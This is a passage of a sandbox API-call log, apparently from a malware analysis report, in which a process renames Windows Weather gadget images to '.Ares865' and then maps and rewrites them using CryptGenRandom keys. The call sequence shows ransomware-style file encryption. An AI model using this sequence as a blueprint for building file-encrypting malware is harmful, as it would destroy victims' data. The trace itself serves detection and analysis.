(x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\8.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\8.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.990] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5457) returned 1 [0115.991] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.991] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.991] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.992] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1860, lpName=0x0) returned 0x170 [0115.993] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1860) returned 0x190000 [0115.994] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.995] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.995] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.996] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\9.png.Ares865") returned 82 [0115.996] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\9.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\9.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\9.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\9.png.ares865"), dwFlags=0x1) returned 1 [0115.997] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\9.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\9.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.997] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5457) returned 1 [0115.998] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.998] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.998] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.999] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1860, lpName=0x0) returned 0x170 [0116.002] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1860) returned 0x190000 [0116.005] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.006] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.006] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.007] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\activity16v.png.Ares865") returned 92 [0116.007] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\activity16v.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\activity16v.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\activity16v.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\activity16v.png.ares865"), dwFlags=0x1) returned 1 [0116.010] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\activity16v.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\activity16v.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.010] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12338) returned 1 [0116.010] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.011] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.011] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.011] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3340, lpName=0x0) returned 0x170 [0116.015] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3340) returned 0x190000 [0116.019] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.019] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.020] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.020] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\alertIcon.png.Ares865") returned 90 [0116.020] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\alertIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\alerticon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\alertIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\alerticon.png.ares865"), dwFlags=0x1) returned 1 [0116.022] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\alertIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\alerticon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.022] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=426) returned 1 [0116.022] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.023] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.023] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.023] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b0, lpName=0x0) returned 0x170 [0116.026] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4b0) returned 0x190000 [0116.032] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.033] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.033] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.034] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_down.png.Ares865") returned 95 [0116.034] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_down.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_down.png.ares865"), dwFlags=0x1) returned 1 [0116.036] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_down.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.036] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3294) returned 1 [0116.036] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.037] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.037] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.037] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfe0, lpName=0x0) returned 0x170 [0116.040] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfe0) returned 0x190000 [0116.041] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.042] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.042] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.042] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_down_BIDI.png.Ares865") returned 100 [0116.042] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_down_BIDI.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_down_bidi.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_down_BIDI.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_down_bidi.png.ares865"), dwFlags=0x1) returned 1 [0116.052] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_down_BIDI.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_down_bidi.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.052] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3295) returned 1 [0116.052] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.053] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.053] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.054] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfe0, lpName=0x0) returned 0x170 [0116.055] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfe0) returned 0x190000 [0116.056] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.057] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.057] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.058] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_over.png.Ares865") returned 95 [0116.058] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_over.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_over.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_over.png.ares865"), dwFlags=0x1) returned 1 [0116.066] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_over.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_over.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.066] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3291) returned 1 [0116.066] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.069] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.069] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.069] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfe0, lpName=0x0) returned 0x170 [0116.070] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfe0) returned 0x190000 [0116.071] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.072] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.072] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.072] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_up.png.Ares865") returned 93 [0116.072] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_up.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_up.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_up.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_up.png.ares865"), dwFlags=0x1) returned 1 [0116.074] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_up.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_up.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.077] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3240) returned 1 [0116.077] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.078] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.078] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.078] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfb0, lpName=0x0) returned 0x170 [0116.081] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfb0) returned 0x190000 [0116.082] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.083] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.083] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.083] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_down.png.Ares865") returned 96 [0116.083] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_down.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_down.png.ares865"), dwFlags=0x1) returned 1 [0116.085] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_down.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.085] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3573) returned 1 [0116.085] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.086] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.086] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.086] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1100, lpName=0x0) returned 0x170 [0116.088] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1100) returned 0x190000 [0116.088] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.089] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.089] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.090] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_down_BIDI.png.Ares865") returned 101 [0116.090] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_down_BIDI.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_down_bidi.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_down_BIDI.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_down_bidi.png.ares865"), dwFlags=0x1) returned 1 [0116.091] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_down_BIDI.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_down_bidi.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.091] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3581) returned 1 [0116.092] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.092] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.092] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.092] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1100, lpName=0x0) returned 0x170 [0116.094] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1100) returned 0x190000 [0116.094] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.095] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.095] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.096] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_over.png.Ares865") returned 96 [0116.096] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_over.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_over.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_over.png.ares865"), dwFlags=0x1) returned 1 [0116.097] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_over.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_over.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.097] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3559) returned 1 [0116.098] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.098] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.098] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.099] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10f0, lpName=0x0) returned 0x170 [0116.101] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10f0) returned 0x190000 [0116.101] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.102] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.102] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.103] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_over_BIDI.png.Ares865") returned 101 [0116.103] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_over_BIDI.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_over_bidi.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_over_BIDI.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_over_bidi.png.ares865"), dwFlags=0x1) returned 1 [0116.104] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_over_BIDI.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_over_bidi.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.104] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3582) returned 1 [0116.104] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.105] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.105] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.111] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.124] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, 